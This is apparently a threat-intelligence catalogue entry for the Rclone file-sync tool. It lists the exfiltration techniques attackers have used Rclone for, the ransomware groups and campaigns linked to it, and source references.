1. Home
  2. Software
  3. Rclone

Rclone

Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[1][2][3][4][5]

ID: S1040
Type: TOOL
Platforms: Linux, Windows, macOS
Contributors: Edward Millington; Ian McKay
Version: 1.1
Created: 30 August 2022
Last Modified: 04 April 2024
Version Permalink
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Rclone can compress files using gzip prior to exfiltration.[1]
Enterprise T1030 Data Transfer Size Limits

The Rclone "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.[1][5]
Enterprise T1048 .002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Rclone can exfiltrate data over SFTP or HTTPS via WebDAV.[1]
.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Rclone can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.[1]
Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.[1][5]
Enterprise T1083 File and Directory Discovery

Rclone can list files and directories with the ls, lsd, and lsl commands.[1]

Groups That Use This Software

ID Name References
G1032 INC Ransom

[6]
G1003 Ember Bear

Ember Bear has used Rclone to exfiltrate information from victim environments.[7]
G1024 Akira

[8]
G1021 Cinnamon Tempest

[9]

Campaigns

ID Name Description
C0015 C0015

[5]

References

  1. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
  2. Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.
  3. Aaron Greetham. (2021, May 27). Detecting Rclone – An Effective Tool for Exfiltration. Retrieved August 30, 2022.
  4. Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.
  5. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  1. Carvey, H. (2024, May 1). LOLBin to INC Ransomware. Retrieved June 5, 2024.
  2. US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
  3. Steven Campbell, Akshay Suthar, & Connor Belfiorre. (2023, July 26). Conti and Akira: Chained Together. Retrieved February 20, 2024.
  4. Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.